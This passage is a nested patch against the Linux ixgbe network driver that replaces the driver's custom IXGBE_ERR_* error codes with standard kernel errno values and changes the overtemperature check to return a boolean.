+ static void ixgbe_phy_interrupt_subtask(struct ixgbe_adapter *adapter)
+ {
+ 	struct ixgbe_hw *hw = &adapter->hw;
+-	u32 status;
++	bool overtemp;
+ 
+ 	if (!(adapter->flags2 & IXGBE_FLAG2_PHY_INTERRUPT))
+ 		return;
+@@ -7956,11 +7954,9 @@ static void ixgbe_phy_interrupt_subtask(struct ixgbe_adapter *adapter)
+ 	if (!hw->phy.ops.handle_lasi)
+ 		return;
+ 
+-	status = hw->phy.ops.handle_lasi(&adapter->hw);
+-	if (status != IXGBE_ERR_OVERTEMP)
+-		return;
+-
+-	e_crit(drv, "%s\n", ixgbe_overheat_msg);
++	hw->phy.ops.handle_lasi(&adapter->hw, &overtemp);
++	if (overtemp)
++		e_crit(drv, "%s\n", ixgbe_overheat_msg);
+ }
+ 
+ static void ixgbe_reset_subtask(struct ixgbe_adapter *adapter)
+@@ -10943,9 +10939,9 @@ static int ixgbe_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	err = hw->mac.ops.reset_hw(hw);
+ 	hw->phy.reset_if_overtemp = false;
+ 	ixgbe_set_eee_capable(adapter);
+-	if (err == IXGBE_ERR_SFP_NOT_PRESENT) {
++	if (err == -ENOENT) {
+ 		err = 0;
+-	} else if (err == IXGBE_ERR_SFP_NOT_SUPPORTED) {
++	} else if (err == -EOPNOTSUPP) {
+ 		e_dev_err("failed to load because an unsupported SFP+ or QSFP module type was detected.\n");
+ 		e_dev_err("Reload the driver after installing a supported module.\n");
+ 		goto err_sw_init;
+@@ -11161,7 +11157,7 @@ skip_sriov:
+ 
+ 	/* reset the hardware with the new settings */
+ 	err = hw->mac.ops.start_hw(hw);
+-	if (err == IXGBE_ERR_EEPROM_VERSION) {
++	if (err == -EACCES) {
+ 		/* We are running on a pre-production device, log a warning */
+ 		e_dev_warn("This device is a pre-production adapter/LOM. "
+ 			   "Please be aware there may be issues associated "
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.c
+index 5679293e53f7a..fe7ef5773369a 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.c
+@@ -24,7 +24,7 @@ s32 ixgbe_read_mbx(struct ixgbe_hw *hw, u32 *msg, u16 size, u16 mbx_id)
+ 		size = mbx->size;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	return mbx->ops->read(hw, msg, size, mbx_id);
+ }
+@@ -43,10 +43,10 @@ s32 ixgbe_write_mbx(struct ixgbe_hw *hw, u32 *msg, u16 size, u16 mbx_id)
+ 	struct ixgbe_mbx_info *mbx = &hw->mbx;
+ 
+ 	if (size > mbx->size)
+-		return IXGBE_ERR_MBX;
++		return -EINVAL;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	return mbx->ops->write(hw, msg, size, mbx_id);
+ }
+@@ -63,7 +63,7 @@ s32 ixgbe_check_for_msg(struct ixgbe_hw *hw, u16 mbx_id)
+ 	struct ixgbe_mbx_info *mbx = &hw->mbx;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	return mbx->ops->check_for_msg(hw, mbx_id);
+ }
+@@ -80,7 +80,7 @@ s32 ixgbe_check_for_ack(struct ixgbe_hw *hw, u16 mbx_id)
+ 	struct ixgbe_mbx_info *mbx = &hw->mbx;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	return mbx->ops->check_for_ack(hw, mbx_id);
+ }
+@@ -97,7 +97,7 @@ s32 ixgbe_check_for_rst(struct ixgbe_hw *hw, u16 mbx_id)
+ 	struct ixgbe_mbx_info *mbx = &hw->mbx;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	return mbx->ops->check_for_rst(hw, mbx_id);
+ }
+@@ -115,12 +115,12 @@ static s32 ixgbe_poll_for_msg(struct ixgbe_hw *hw, u16 mbx_id)
+ 	int countdown = mbx->timeout;
+ 
+ 	if (!countdown || !mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	while (mbx->ops->check_for_msg(hw, mbx_id)) {
+ 		countdown--;
+ 		if (!countdown)
+-			return IXGBE_ERR_MBX;
++			return -EIO;
+ 		udelay(mbx->usec_delay);
+ 	}
+ 
+@@ -140,12 +140,12 @@ static s32 ixgbe_poll_for_ack(struct ixgbe_hw *hw, u16 mbx_id)
+ 	int countdown = mbx->timeout;
+ 
+ 	if (!countdown || !mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	while (mbx->ops->check_for_ack(hw, mbx_id)) {
+ 		countdown--;
+ 		if (!countdown)
+-			return IXGBE_ERR_MBX;
++			return -EIO;
+ 		udelay(mbx->usec_delay);
+ 	}
+ 
+@@ -169,7 +169,7 @@ static s32 ixgbe_read_posted_mbx(struct ixgbe_hw *hw, u32 *msg, u16 size,
+ 	s32 ret_val;
+ 
+ 	if (!mbx->ops)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	ret_val = ixgbe_poll_for_msg(hw, mbx_id);
+ 	if (ret_val)
+@@ -197,7 +197,7 @@ static s32 ixgbe_write_posted_mbx(struct ixgbe_hw *hw, u32 *msg, u16 size,
+ 
+ 	/* exit if either we can't write or there isn't a defined timeout */
+ 	if (!mbx->ops || !mbx->timeout)
+-		return IXGBE_ERR_MBX;
++		return -EIO;
+ 
+ 	/* send msg */
+ 	ret_val = mbx->ops->write(hw, msg, size, mbx_id);
+@@ -217,7 +217,7 @@ static s32 ixgbe_check_for_bit_pf(struct ixgbe_hw *hw, u32 mask, s32 index)
+ 		return 0;
+ 	}
+ 
+-	return IXGBE_ERR_MBX;
++	return -EIO;
+ }
+ 
+ /**
+@@ -238,7 +238,7 @@ static s32 ixgbe_check_for_msg_pf(struct ixgbe_hw *hw, u16 vf_number)
+ 		return 0;
+ 	}
+ 
+-	return IXGBE_ERR_MBX;
++	return -EIO;
+ }
+ 
+ /**
+@@ -259,7 +259,7 @@ static s32 ixgbe_check_for_ack_pf(struct ixgbe_hw *hw, u16 vf_number)
+ 		return 0;
+ 	}
+ 
+-	return IXGBE_ERR_MBX;
++	return -EIO;
+ }
+ 
+ /**
+@@ -295,7 +295,7 @@ static s32 ixgbe_check_for_rst_pf(struct ixgbe_hw *hw, u16 vf_number)
+ 		return 0;
+ 	}
+ 
+-	return IXGBE_ERR_MBX;
++	return -EIO;
+ }
+ 
+ /**
+@@ -317,7 +317,7 @@ static s32 ixgbe_obtain_mbx_lock_pf(struct ixgbe_hw *hw, u16 vf_number)
+ 	if (p2v_mailbox & IXGBE_PFMAILBOX_PFU)
+ 		return 0;
+ 
+-	return IXGBE_ERR_MBX;
++	return -EIO;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.h b/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.h
+index 8f4316b19278c..6434c190e7a4c 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.h
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_mbx.h
+@@ -7,7 +7,6 @@
+ #include "ixgbe_type.h"
+ 
+ #define IXGBE_VFMAILBOX_SIZE        16 /* 16 32 bit words - 64 bytes */
+-#define IXGBE_ERR_MBX               -100
+ 
+ #define IXGBE_VFMAILBOX             0x002FC
+ #define IXGBE_VFMBMEM               0x00200
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
+index 123dca9ce4683..305afb82388b7 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.c
+@@ -102,7 +102,7 @@ s32 ixgbe_read_i2c_combined_generic_int(struct ixgbe_hw *hw, u8 addr,
+ 	csum = ~csum;
+ 	do {
+ 		if (lock && hw->mac.ops.acquire_swfw_sync(hw, swfw_mask))
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 		ixgbe_i2c_start(hw);
+ 		/* Device Address and write indication */
+ 		if (ixgbe_out_i2c_byte_ack(hw, addr))
+@@ -150,7 +150,7 @@ fail:
+ 			hw_dbg(hw, "I2C byte read combined error.\n");
+ 	} while (retry < max_retry);
+ 
+-	return IXGBE_ERR_I2C;
++	return -EIO;
+ }
+ 
+ /**
+@@ -179,7 +179,7 @@ s32 ixgbe_write_i2c_combined_generic_int(struct ixgbe_hw *hw, u8 addr,
+ 	csum = ~csum;
+ 	do {
+ 		if (lock && hw->mac.ops.acquire_swfw_sync(hw, swfw_mask))
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 		ixgbe_i2c_start(hw);
+ 		/* Device Address and write indication */
+ 		if (ixgbe_out_i2c_byte_ack(hw, addr))
+@@ -215,7 +215,7 @@ fail:
+ 			hw_dbg(hw, "I2C byte write combined error.\n");
+ 	} while (retry < max_retry);
+ 
+-	return IXGBE_ERR_I2C;
++	return -EIO;
+ }
+ 
+ /**
+@@ -262,8 +262,8 @@ static bool ixgbe_probe_phy(struct ixgbe_hw *hw, u16 phy_addr)
+  **/
+ s32 ixgbe_identify_phy_generic(struct ixgbe_hw *hw)
+ {
++	u32 status = -EFAULT;
+ 	u32 phy_addr;
+-	u32 status = IXGBE_ERR_PHY_ADDR_INVALID;
+ 
+ 	if (!hw->phy.phy_semaphore_mask) {
+ 		if (hw->bus.lan_id)
+@@ -282,7 +282,7 @@ s32 ixgbe_identify_phy_generic(struct ixgbe_hw *hw)
+ 		if (ixgbe_probe_phy(hw, phy_addr))
+ 			return 0;
+ 		else
+-			return IXGBE_ERR_PHY_ADDR_INVALID;
++			return -EFAULT;
+ 	}
+ 
+ 	for (phy_addr = 0; phy_addr < IXGBE_MAX_PHY_ADDR; phy_addr++) {
+@@ -408,8 +408,7 @@ s32 ixgbe_reset_phy_generic(struct ixgbe_hw *hw)
+ 		return status;
+ 
+ 	/* Don't reset PHY if it's shut down due to overtemp. */
+-	if (!hw->phy.reset_if_overtemp &&
+-	    (IXGBE_ERR_OVERTEMP == hw->phy.ops.check_overtemp(hw)))
++	if (!hw->phy.reset_if_overtemp && hw->phy.ops.check_overtemp(hw))
+ 		return 0;
+ 
+ 	/* Blocked by MNG FW so bail */
+@@ -457,7 +456,7 @@ s32 ixgbe_reset_phy_generic(struct ixgbe_hw *hw)
+ 
+ 	if (ctrl & MDIO_CTRL1_RESET) {
+ 		hw_dbg(hw, "PHY reset polling failed to complete.\n");
+-		return IXGBE_ERR_RESET_FAILED;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -500,7 +499,7 @@ s32 ixgbe_read_phy_reg_mdi(struct ixgbe_hw *hw, u32 reg_addr, u32 device_type,
+ 
+ 	if ((command & IXGBE_MSCA_MDI_COMMAND) != 0) {
+ 		hw_dbg(hw, "PHY address command did not complete.\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	/* Address cycle complete, setup and write the read
+@@ -527,7 +526,7 @@ s32 ixgbe_read_phy_reg_mdi(struct ixgbe_hw *hw, u32 reg_addr, u32 device_type,
+ 
+ 	if ((command & IXGBE_MSCA_MDI_COMMAND) != 0) {
+ 		hw_dbg(hw, "PHY read command didn't complete\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	/* Read operation is complete.  Get the data
+@@ -559,7 +558,7 @@ s32 ixgbe_read_phy_reg_generic(struct ixgbe_hw *hw, u32 reg_addr,
+ 						phy_data);
+ 		hw->mac.ops.release_swfw_sync(hw, gssr);
+ 	} else {
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	}
+ 
+ 	return status;
+@@ -604,7 +603,7 @@ s32 ixgbe_write_phy_reg_mdi(struct ixgbe_hw *hw, u32 reg_addr,
+ 
+ 	if ((command & IXGBE_MSCA_MDI_COMMAND) != 0) {
+ 		hw_dbg(hw, "PHY address cmd didn't complete\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	/*
+@@ -632,7 +631,7 @@ s32 ixgbe_write_phy_reg_mdi(struct ixgbe_hw *hw, u32 reg_addr,
+ 
+ 	if ((command & IXGBE_MSCA_MDI_COMMAND) != 0) {
+ 		hw_dbg(hw, "PHY write cmd didn't complete\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -657,7 +656,7 @@ s32 ixgbe_write_phy_reg_generic(struct ixgbe_hw *hw, u32 reg_addr,
+ 						 phy_data);
+ 		hw->mac.ops.release_swfw_sync(hw, gssr);
+ 	} else {
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 	}
+ 
+ 	return status;
+@@ -1303,7 +1302,7 @@ s32 ixgbe_reset_phy_nl(struct ixgbe_hw *hw)
+ 
+ 	if ((phy_data & MDIO_CTRL1_RESET) != 0) {
+ 		hw_dbg(hw, "PHY reset did not complete.\n");
+-		return IXGBE_ERR_PHY;
++		return -EIO;
+ 	}
+ 
+ 	/* Get init offsets */
+@@ -1360,12 +1359,12 @@ s32 ixgbe_reset_phy_nl(struct ixgbe_hw *hw)
+ 				hw_dbg(hw, "SOL\n");
+ 			} else {
+ 				hw_dbg(hw, "Bad control value\n");
+-				return IXGBE_ERR_PHY;
++				return -EIO;
+ 			}
+ 			break;
+ 		default:
+ 			hw_dbg(hw, "Bad control type\n");
+-			return IXGBE_ERR_PHY;
++			return -EIO;
+ 		}
+ 	}
+ 
+@@ -1373,7 +1372,7 @@ s32 ixgbe_reset_phy_nl(struct ixgbe_hw *hw)
+ 
+ err_eeprom:
+ 	hw_err(hw, "eeprom read at offset %d failed\n", data_offset);
+-	return IXGBE_ERR_PHY;
++	return -EIO;
+ }
+ 
+ /**
+@@ -1391,10 +1390,10 @@ s32 ixgbe_identify_module_generic(struct ixgbe_hw *hw)
+ 		return ixgbe_identify_qsfp_module_generic(hw);
+ 	default:
+ 		hw->phy.sfp_type = ixgbe_sfp_type_not_present;
+-		return IXGBE_ERR_SFP_NOT_PRESENT;
++		return -ENOENT;
+ 	}
+ 
+-	return IXGBE_ERR_SFP_NOT_PRESENT;
++	return -ENOENT;
+ }
+ 
+ /**
+@@ -1419,7 +1418,7 @@ s32 ixgbe_identify_sfp_module_generic(struct ixgbe_hw *hw)
+ 
+ 	if (hw->mac.ops.get_media_type(hw) != ixgbe_media_type_fiber) {
+ 		hw->phy.sfp_type = ixgbe_sfp_type_not_present;
+-		return IXGBE_ERR_SFP_NOT_PRESENT;
++		return -ENOENT;
+ 	}
+ 
+ 	/* LAN ID is needed for sfp_type determination */
+@@ -1434,7 +1433,7 @@ s32 ixgbe_identify_sfp_module_generic(struct ixgbe_hw *hw)
+ 
+ 	if (identifier != IXGBE_SFF_IDENTIFIER_SFP) {
+ 		hw->phy.type = ixgbe_phy_sfp_unsupported;
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 	status = hw->phy.ops.read_i2c_eeprom(hw,
+ 					     IXGBE_SFF_1GBE_COMP_CODES,
+@@ -1625,7 +1624,7 @@ s32 ixgbe_identify_sfp_module_generic(struct ixgbe_hw *hw)
+ 	      hw->phy.sfp_type == ixgbe_sfp_type_1g_sx_core0 ||
+ 	      hw->phy.sfp_type == ixgbe_sfp_type_1g_sx_core1)) {
+ 		hw->phy.type = ixgbe_phy_sfp_unsupported;
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	/* Anything else 82598-based is supported */
+@@ -1649,7 +1648,7 @@ s32 ixgbe_identify_sfp_module_generic(struct ixgbe_hw *hw)
+ 		}
+ 		hw_dbg(hw, "SFP+ module not supported\n");
+ 		hw->phy.type = ixgbe_phy_sfp_unsupported;
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 	return 0;
+ 
+@@ -1659,7 +1658,7 @@ err_read_i2c_eeprom:
+ 		hw->phy.id = 0;
+ 		hw->phy.type = ixgbe_phy_unknown;
+ 	}
+-	return IXGBE_ERR_SFP_NOT_PRESENT;
++	return -ENOENT;
+ }
+ 
+ /**
+@@ -1686,7 +1685,7 @@ static s32 ixgbe_identify_qsfp_module_generic(struct ixgbe_hw *hw)
+ 
+ 	if (hw->mac.ops.get_media_type(hw) != ixgbe_media_type_fiber_qsfp) {
+ 		hw->phy.sfp_type = ixgbe_sfp_type_not_present;
+-		return IXGBE_ERR_SFP_NOT_PRESENT;
++		return -ENOENT;
+ 	}
+ 
+ 	/* LAN ID is needed for sfp_type determination */
+@@ -1700,7 +1699,7 @@ static s32 ixgbe_identify_qsfp_module_generic(struct ixgbe_hw *hw)
+ 
+ 	if (identifier != IXGBE_SFF_IDENTIFIER_QSFP_PLUS) {
+ 		hw->phy.type = ixgbe_phy_sfp_unsupported;
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	hw->phy.id = identifier;
+@@ -1768,7 +1767,7 @@ static s32 ixgbe_identify_qsfp_module_generic(struct ixgbe_hw *hw)
+ 		} else {
+ 			/* unsupported module type */
+ 			hw->phy.type = ixgbe_phy_sfp_unsupported;
+-			return IXGBE_ERR_SFP_NOT_SUPPORTED;
++			return -EOPNOTSUPP;
+ 		}
+ 	}
+ 
+@@ -1828,7 +1827,7 @@ static s32 ixgbe_identify_qsfp_module_generic(struct ixgbe_hw *hw)
+ 			}
+ 			hw_dbg(hw, "QSFP module not supported\n");
+ 			hw->phy.type = ixgbe_phy_sfp_unsupported;
+-			return IXGBE_ERR_SFP_NOT_SUPPORTED;
++			return -EOPNOTSUPP;
+ 		}
+ 		return 0;
+ 	}
+@@ -1839,7 +1838,7 @@ err_read_i2c_eeprom:
+ 	hw->phy.id = 0;
+ 	hw->phy.type = ixgbe_phy_unknown;
+ 
+-	return IXGBE_ERR_SFP_NOT_PRESENT;
++	return -ENOENT;
+ }
+ 
+ /**
+@@ -1859,14 +1858,14 @@ s32 ixgbe_get_sfp_init_sequence_offsets(struct ixgbe_hw *hw,
+ 	u16 sfp_type = hw->phy.sfp_type;
+ 
+ 	if (hw->phy.sfp_type == ixgbe_sfp_type_unknown)
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 
+ 	if (hw->phy.sfp_type == ixgbe_sfp_type_not_present)
+-		return IXGBE_ERR_SFP_NOT_PRESENT;
++		return -ENOENT;
+ 
+ 	if ((hw->device_id == IXGBE_DEV_ID_82598_SR_DUAL_PORT_EM) &&
+ 	    (hw->phy.sfp_type == ixgbe_sfp_type_da_cu))
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 
+ 	/*
+ 	 * Limiting active cables and 1G Phys must be initialized as
+@@ -1887,11 +1886,11 @@ s32 ixgbe_get_sfp_init_sequence_offsets(struct ixgbe_hw *hw,
+ 	if (hw->eeprom.ops.read(hw, IXGBE_PHY_INIT_OFFSET_NL, list_offset)) {
+ 		hw_err(hw, "eeprom read at %d failed\n",
+ 		       IXGBE_PHY_INIT_OFFSET_NL);
+-		return IXGBE_ERR_SFP_NO_INIT_SEQ_PRESENT;
++		return -EIO;
+ 	}
+ 
+ 	if ((!*list_offset) || (*list_offset == 0xFFFF))
+-		return IXGBE_ERR_SFP_NO_INIT_SEQ_PRESENT;
++		return -EIO;
+ 
+ 	/* Shift offset to first ID word */
+ 	(*list_offset)++;
+@@ -1910,7 +1909,7 @@ s32 ixgbe_get_sfp_init_sequence_offsets(struct ixgbe_hw *hw,
+ 				goto err_phy;
+ 			if ((!*data_offset) || (*data_offset == 0xFFFF)) {
+ 				hw_dbg(hw, "SFP+ module not supported\n");
+-				return IXGBE_ERR_SFP_NOT_SUPPORTED;
++				return -EOPNOTSUPP;
+ 			} else {
+ 				break;
+ 			}
+@@ -1923,14 +1922,14 @@ s32 ixgbe_get_sfp_init_sequence_offsets(struct ixgbe_hw *hw,
+ 
+ 	if (sfp_id == IXGBE_PHY_INIT_END_NL) {
+ 		hw_dbg(hw, "No matching SFP+ module found\n");
+-		return IXGBE_ERR_SFP_NOT_SUPPORTED;
++		return -EOPNOTSUPP;
+ 	}
+ 
+ 	return 0;
+ 
+ err_phy:
+ 	hw_err(hw, "eeprom read at offset %d failed\n", *list_offset);
+-	return IXGBE_ERR_PHY;
++	return -EIO;
+ }
+ 
+ /**
+@@ -2025,7 +2024,7 @@ static s32 ixgbe_read_i2c_byte_generic_int(struct ixgbe_hw *hw, u8 byte_offset,
+ 
+ 	do {
+ 		if (lock && hw->mac.ops.acquire_swfw_sync(hw, swfw_mask))
+-			return IXGBE_ERR_SWFW_SYNC;
++			return -EBUSY;
+ 
+ 		ixgbe_i2c_start(hw);
+ 
+@@ -2141,7 +2140,7 @@ static s32 ixgbe_write_i2c_byte_generic_int(struct ixgbe_hw *hw, u8 byte_offset,
+ 	u32 swfw_mask = hw->phy.phy_semaphore_mask;
+ 
+ 	if (lock && hw->mac.ops.acquire_swfw_sync(hw, swfw_mask))
+-		return IXGBE_ERR_SWFW_SYNC;
++		return -EBUSY;
+ 
+ 	do {
+ 		ixgbe_i2c_start(hw);
+@@ -2383,7 +2382,7 @@ static s32 ixgbe_get_i2c_ack(struct ixgbe_hw *hw)
+ 
+ 	if (ack == 1) {
+ 		hw_dbg(hw, "I2C ack was not received.\n");
+-		status = IXGBE_ERR_I2C;
++		status = -EIO;
+ 	}
+ 
+ 	ixgbe_lower_i2c_clk(hw, &i2cctl);
+@@ -2455,7 +2454,7 @@ static s32 ixgbe_clock_out_i2c_bit(struct ixgbe_hw *hw, bool data)
+ 		udelay(IXGBE_I2C_T_LOW);
+ 	} else {
+ 		hw_dbg(hw, "I2C data was not set to %X\n", data);
+-		return IXGBE_ERR_I2C;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -2551,7 +2550,7 @@ static s32 ixgbe_set_i2c_data(struct ixgbe_hw *hw, u32 *i2cctl, bool data)
+ 	*i2cctl = IXGBE_READ_REG(hw, IXGBE_I2CCTL(hw));
+ 	if (data != ixgbe_get_i2c_data(hw, i2cctl)) {
+ 		hw_dbg(hw, "Error - I2C data was not set to %X.\n", data);
+-		return IXGBE_ERR_I2C;
++		return -EIO;
+ 	}
+ 
+ 	return 0;
+@@ -2621,22 +2620,24 @@ static void ixgbe_i2c_bus_clear(struct ixgbe_hw *hw)
+  *  @hw: pointer to hardware structure
+  *
+  *  Checks if the LASI temp alarm status was triggered due to overtemp
++ *
++ *  Return true when an overtemp event detected, otherwise false.
+  **/
+-s32 ixgbe_tn_check_overtemp(struct ixgbe_hw *hw)
++bool ixgbe_tn_check_overtemp(struct ixgbe_hw *hw)
+ {
+ 	u16 phy_data = 0;
++	u32 status;
+ 
+ 	if (hw->device_id != IXGBE_DEV_ID_82599_T3_LOM)
+-		return 0;
++		return false;
+ 
+ 	/* Check that the LASI temp alarm status was triggered */
+-	hw->phy.ops.read_reg(hw, IXGBE_TN_LASI_STATUS_REG,
+-			     MDIO_MMD_PMAPMD, &phy_data);
+-
+-	if (!(phy_data & IXGBE_TN_LASI_STATUS_TEMP_ALARM))
+-		return 0;
++	status = hw->phy.ops.read_reg(hw, IXGBE_TN_LASI_STATUS_REG,
++				      MDIO_MMD_PMAPMD, &phy_data);
++	if (status)
++		return false;
+ 
+-	return IXGBE_ERR_OVERTEMP;
++	return !!(phy_data & IXGBE_TN_LASI_STATUS_TEMP_ALARM);
+ }
+ 
+ /** ixgbe_set_copper_phy_power - Control power for copper phy
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.h b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.h
+index 6544c4539c0de..ef72729d7c933 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.h
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_phy.h
+@@ -155,7 +155,7 @@ s32 ixgbe_identify_sfp_module_generic(struct ixgbe_hw *hw);
+ s32 ixgbe_get_sfp_init_sequence_offsets(struct ixgbe_hw *hw,
+ 					u16 *list_offset,
+ 					u16 *data_offset);
+-s32 ixgbe_tn_check_overtemp(struct ixgbe_hw *hw);
++bool ixgbe_tn_check_overtemp(struct ixgbe_hw *hw);
+ s32 ixgbe_read_i2c_byte_generic(struct ixgbe_hw *hw, u8 byte_offset,
+ 				u8 dev_addr, u8 *data);
+ s32 ixgbe_read_i2c_byte_generic_unlocked(struct ixgbe_hw *hw, u8 byte_offset,
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
+index ea88ac04ab9ad..198ab9d97618c 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_sriov.c
+@@ -1329,7 +1329,7 @@ static int ixgbe_rcv_msg_from_vf(struct ixgbe_adapter *adapter, u32 vf)
+ 		break;
+ 	default:
+ 		e_err(drv, "Unhandled Msg %8.8x\n", msgbuf[0]);
+-		retval = IXGBE_ERR_MBX;
++		retval = -EIO;
+ 		break;
+ 	}
+ 
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h b/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
+index 2b00db92b08f5..61b9774b3d31e 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_type.h
+@@ -3509,10 +3509,10 @@ struct ixgbe_phy_operations {
+ 	s32 (*read_i2c_sff8472)(struct ixgbe_hw *, u8 , u8 *);
+ 	s32 (*read_i2c_eeprom)(struct ixgbe_hw *, u8 , u8 *);
+ 	s32 (*write_i2c_eeprom)(struct ixgbe_hw *, u8, u8);
+-	s32 (*check_overtemp)(struct ixgbe_hw *);
++	bool (*check_overtemp)(struct ixgbe_hw *);
+ 	s32 (*set_phy_power)(struct ixgbe_hw *, bool on);
+ 	s32 (*enter_lplu)(struct ixgbe_hw *);
+-	s32 (*handle_lasi)(struct ixgbe_hw *hw);
++	s32 (*handle_lasi)(struct ixgbe_hw *hw, bool *);
+ 	s32 (*read_i2c_byte_unlocked)(struct ixgbe_hw *, u8 offset, u8 addr,
+ 				      u8 *value);
+ 	s32 (*write_i2c_byte_unlocked)(struct ixgbe_hw *, u8 offset, u8 addr,
+@@ -3665,45 +3665,6 @@ struct ixgbe_info {
+ 	const u32			*mvals;
+ };
+ 
+-
+-/* Error Codes */
+-#define IXGBE_ERR_EEPROM                        -1
+-#define IXGBE_ERR_EEPROM_CHECKSUM               -2
+-#define IXGBE_ERR_PHY                           -3
+-#define IXGBE_ERR_CONFIG                        -4
+-#define IXGBE_ERR_PARAM                         -5
+-#define IXGBE_ERR_MAC_TYPE                      -6
+-#define IXGBE_ERR_UNKNOWN_PHY                   -7
+-#define IXGBE_ERR_LINK_SETUP                    -8
+-#define IXGBE_ERR_ADAPTER_STOPPED               -9
+-#define IXGBE_ERR_INVALID_MAC_ADDR              -10
+-#define IXGBE_ERR_DEVICE_NOT_SUPPORTED          -11
+-#define IXGBE_ERR_PRIMARY_REQUESTS_PENDING      -12
+-#define IXGBE_ERR_INVALID_LINK_SETTINGS         -13
+-#define IXGBE_ERR_AUTONEG_NOT_COMPLETE          -14
+-#define IXGBE_ERR_RESET_FAILED                  -15
+-#define IXGBE_ERR_SWFW_SYNC                     -16
+-#define IXGBE_ERR_PHY_ADDR_INVALID              -17
+-#define IXGBE_ERR_I2C                           -18
+-#define IXGBE_ERR_SFP_NOT_SUPPORTED             -19
+-#define IXGBE_ERR_SFP_NOT_PRESENT               -20
+-#define IXGBE_ERR_SFP_NO_INIT_SEQ_PRESENT       -21
+-#define IXGBE_ERR_NO_SAN_ADDR_PTR               -22
+-#define IXGBE_ERR_FDIR_REINIT_FAILED            -23
+-#define IXGBE_ERR_EEPROM_VERSION                -24
+-#define IXGBE_ERR_NO_SPACE                      -25
+-#define IXGBE_ERR_OVERTEMP                      -26
+-#define IXGBE_ERR_FC_NOT_NEGOTIATED             -27
+-#define IXGBE_ERR_FC_NOT_SUPPORTED              -28
+-#define IXGBE_ERR_SFP_SETUP_NOT_COMPLETE        -30
+-#define IXGBE_ERR_PBA_SECTION                   -31
+-#define IXGBE_ERR_INVALID_ARGUMENT              -32
+-#define IXGBE_ERR_HOST_INTERFACE_COMMAND        -33
+-#define IXGBE_ERR_FDIR_CMD_INCOMPLETE		-38
+-#define IXGBE_ERR_FW_RESP_INVALID		-39
+-#define IXGBE_ERR_TOKEN_RETRY			-40
+-#define IXGBE_NOT_IMPLEMENTED                   0x7FFFFFFF
+-
+ #define IXGBE_FUSES0_GROUP(_i)		(0x11158 + ((_i) * 4))
+ #define IXGBE_FUSES0_300MHZ		BIT(5)
+ #define IXGBE_FUSES0_REV_MASK		(3u << 6)
+diff --git a/drivers/net/ethernet/intel/ixgbe/ixgbe_x540.c b/drivers/net/ethernet/intel/ixgbe/ixgbe_x540.c
+index d5cfb51ff648d..15325c549d9b5 100644
+--- a/drivers/net/ethernet/intel/ixgbe/ixgbe_x540.c
++++ b/drivers/net/ethernet/intel/ixgbe/ixgbe_x540.c
+@@ -84,7 +84,7 @@ mac_reset_top:
+ 	status = hw->mac.ops.acquire_swfw_sync(hw, swfw_mask);
